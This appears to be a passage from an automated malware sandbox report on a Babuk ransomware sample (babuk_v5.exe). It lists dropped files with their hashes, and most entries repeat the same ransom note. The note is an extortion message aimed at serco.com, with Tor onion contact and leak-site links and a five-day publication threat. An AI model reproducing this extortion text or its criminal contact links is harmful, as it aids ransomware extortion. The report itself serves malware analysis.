                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-RS\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sv-FI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sv-SE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\tr-TR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\uk-UA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\uz-Latn-UZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.549764595269047
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlWUOXGdpMxub1yQomo0UWaWunGWgerWilsDxKUdce4CRxfc9UxNvEEn:mF4T/7o0ZBesDsUeMl00vtn
                                                                            MD5:A446107F61FE5C6CA13BE62BFAE7A815
                                                                            SHA1:70E00C9A4E69DAEBA57F9C180CA9DF7D03E70F07
                                                                            SHA-256:7AFAC2DC3CDBC35E74EB5C32E82872C0D6C14BF4E097BA001E1DF8BEEB4B0F2A
